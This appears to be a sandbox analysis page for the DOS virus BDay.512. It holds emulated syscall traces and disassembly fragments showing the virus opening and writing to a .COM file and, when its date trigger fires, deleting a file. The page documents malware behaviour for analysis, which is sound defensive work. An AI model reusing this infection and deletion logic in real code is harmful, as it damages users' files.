Sample viewer

vx.netlux.org/Virus.DOS.BDay.512

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T21:50:43.414798444Z	44	PC: 12a81 \| Get time 0x12a81: mov al, dl 0x12a83: mov byte ptr [0x10e], al 0x12a86: mov ah, 0x2a 0x12a88: int 0x21 0x12a8a: cmp dl, 0x1f 0x12a8d: jne 0x12a9f 0x12a8f: mov ah, 0x2c 0x12a91: int 0x21 0x12a93: cmp ch, 0xb 0x12a96: jne 0x12a9f 0x12a98: mov ah, 0x13 0x12a9a: mov dx, 0x27d 0x12a9d: int 0x21 0x12a9f: mov al, byte ptr [0x105] 0x12aa2: mov byte ptr [0x108], al 0x12aa5: mov ah, byte ptr [0x106] 0x12aa9: mov byte ptr [0x109], ah 0x12aad: mov ah, 0x1a 0x12aaf: mov dx, 0x27d 0x12ab2: int 0x21
2018-12-17T21:50:43.417600751Z	42	PC: 12a8a \| Get date 0x12a8a: cmp dl, 0x1f 0x12a8d: jne 0x12a9f 0x12a8f: mov ah, 0x2c 0x12a91: int 0x21 0x12a93: cmp ch, 0xb 0x12a96: jne 0x12a9f 0x12a98: mov ah, 0x13 0x12a9a: mov dx, 0x27d 0x12a9d: int 0x21 0x12a9f: mov al, byte ptr [0x105] 0x12aa2: mov byte ptr [0x108], al 0x12aa5: mov ah, byte ptr [0x106] 0x12aa9: mov byte ptr [0x109], ah 0x12aad: mov ah, 0x1a 0x12aaf: mov dx, 0x27d 0x12ab2: int 0x21 0x12ab4: mov ah, 0x11 0x12ab6: mov dx, 0x1d4 0x12ab9: int 0x21 0x12abb: mov ah, 0xf
2018-12-17T21:50:43.420758894Z	26	PC: 12ab4 \| Set disk transfer address
2018-12-17T21:50:43.421922866Z	17	PC: 12abb \| Find first file
2018-12-17T21:50:43.428631231Z	15	PC: 12ac2 \| Open file (Filename = 'SLEEP COM d�L�L�L��&�S�2ĈF;�u��nated!')
2018-12-17T21:50:43.436481364Z	26	PC: 12ad4 \| Set disk transfer address
2018-12-17T21:50:43.437936407Z	39	PC: 12af6 \| Random block read
2018-12-17T21:50:43.446121789Z	35	PC: 12b3f \| Get file size in records
2018-12-17T21:50:43.452637223Z	26	PC: 12b46 \| Set disk transfer address
2018-12-17T21:50:43.454099771Z	40	PC: 12b50 \| Random block write
2018-12-17T21:50:43.470300565Z	26	PC: 12b88 \| Set disk transfer address
2018-12-17T21:50:43.4725207Z	40	PC: 12ba0 \| Random block write
2018-12-17T21:50:43.486258075Z	16	PC: 12bb2 \| Close file

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":40,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:39:47.294101326Z	44	PC: 12a81 \| Get time 0x12a81: mov al, dl 0x12a83: mov byte ptr [0x10e], al 0x12a86: mov ah, 0x2a 0x12a88: int 0x21 0x12a8a: cmp dl, 0x1f 0x12a8d: jne 0x12a9f 0x12a8f: mov ah, 0x2c 0x12a91: int 0x21 0x12a93: cmp ch, 0xb 0x12a96: jne 0x12a9f 0x12a98: mov ah, 0x13 0x12a9a: mov dx, 0x27d 0x12a9d: int 0x21 0x12a9f: mov al, byte ptr [0x105] 0x12aa2: mov byte ptr [0x108], al 0x12aa5: mov ah, byte ptr [0x106] 0x12aa9: mov byte ptr [0x109], ah 0x12aad: mov ah, 0x1a 0x12aaf: mov dx, 0x27d 0x12ab2: int 0x21
2018-12-25T11:39:47.29672156Z	42	PC: 12a8a \| Get date 0x12a8a: cmp dl, 0x1f 0x12a8d: jne 0x12a9f 0x12a8f: mov ah, 0x2c 0x12a91: int 0x21 0x12a93: cmp ch, 0xb 0x12a96: jne 0x12a9f 0x12a98: mov ah, 0x13 0x12a9a: mov dx, 0x27d 0x12a9d: int 0x21 0x12a9f: mov al, byte ptr [0x105] 0x12aa2: mov byte ptr [0x108], al 0x12aa5: mov ah, byte ptr [0x106] 0x12aa9: mov byte ptr [0x109], ah 0x12aad: mov ah, 0x1a 0x12aaf: mov dx, 0x27d 0x12ab2: int 0x21 0x12ab4: mov ah, 0x11 0x12ab6: mov dx, 0x1d4 0x12ab9: int 0x21 0x12abb: mov ah, 0xf
2018-12-25T11:39:47.299355423Z	26	PC: 12ab4 \| Set disk transfer address
2018-12-25T11:39:47.300505062Z	17	PC: 12abb \| Find first file
2018-12-25T11:39:47.30745583Z	15	PC: 12ac2 \| Open file (Filename = 'SLEEP COM d�L�L�L��&�S�2ĈF;�u��nated!')
2018-12-25T11:39:47.315085637Z	26	PC: 12ad4 \| Set disk transfer address
2018-12-25T11:39:47.316292608Z	39	PC: 12af6 \| Random block read
2018-12-25T11:39:47.32488305Z	35	PC: 12b3f \| Get file size in records
2018-12-25T11:39:47.331856908Z	26	PC: 12b46 \| Set disk transfer address
2018-12-25T11:39:47.332941142Z	40	PC: 12b50 \| Random block write
2018-12-25T11:39:47.444764905Z	26	PC: 12b88 \| Set disk transfer address
2018-12-25T11:39:47.447593103Z	40	PC: 12ba0 \| Random block write
2018-12-25T11:39:47.568063806Z	16	PC: 12bb2 \| Close file

{"DateBased":true,"Day":31,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":40,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:39:47.477413755Z	44	PC: 12a81 \| Get time 0x12a81: mov al, dl 0x12a83: mov byte ptr [0x10e], al 0x12a86: mov ah, 0x2a 0x12a88: int 0x21 0x12a8a: cmp dl, 0x1f 0x12a8d: jne 0x12a9f 0x12a8f: mov ah, 0x2c 0x12a91: int 0x21 0x12a93: cmp ch, 0xb 0x12a96: jne 0x12a9f 0x12a98: mov ah, 0x13 0x12a9a: mov dx, 0x27d 0x12a9d: int 0x21 0x12a9f: mov al, byte ptr [0x105] 0x12aa2: mov byte ptr [0x108], al 0x12aa5: mov ah, byte ptr [0x106] 0x12aa9: mov byte ptr [0x109], ah 0x12aad: mov ah, 0x1a 0x12aaf: mov dx, 0x27d 0x12ab2: int 0x21
2018-12-25T11:39:47.479477811Z	42	PC: 12a8a \| Get date 0x12a8a: cmp dl, 0x1f 0x12a8d: jne 0x12a9f 0x12a8f: mov ah, 0x2c 0x12a91: int 0x21 0x12a93: cmp ch, 0xb 0x12a96: jne 0x12a9f 0x12a98: mov ah, 0x13 0x12a9a: mov dx, 0x27d 0x12a9d: int 0x21 0x12a9f: mov al, byte ptr [0x105] 0x12aa2: mov byte ptr [0x108], al 0x12aa5: mov ah, byte ptr [0x106] 0x12aa9: mov byte ptr [0x109], ah 0x12aad: mov ah, 0x1a 0x12aaf: mov dx, 0x27d 0x12ab2: int 0x21 0x12ab4: mov ah, 0x11 0x12ab6: mov dx, 0x1d4 0x12ab9: int 0x21 0x12abb: mov ah, 0xf
2018-12-25T11:39:47.482409455Z	44	PC: 12a93 \| Get time 0x12a93: cmp ch, 0xb 0x12a96: jne 0x12a9f 0x12a98: mov ah, 0x13 0x12a9a: mov dx, 0x27d 0x12a9d: int 0x21 0x12a9f: mov al, byte ptr [0x105] 0x12aa2: mov byte ptr [0x108], al 0x12aa5: mov ah, byte ptr [0x106] 0x12aa9: mov byte ptr [0x109], ah 0x12aad: mov ah, 0x1a 0x12aaf: mov dx, 0x27d 0x12ab2: int 0x21 0x12ab4: mov ah, 0x11 0x12ab6: mov dx, 0x1d4 0x12ab9: int 0x21 0x12abb: mov ah, 0xf 0x12abd: mov dx, 0x27d 0x12ac0: int 0x21 0x12ac2: mov si, 0x291 0x12ac5: mov di, 0x10a
2018-12-25T11:39:47.484668288Z	19	PC: 12a9f \| Delete file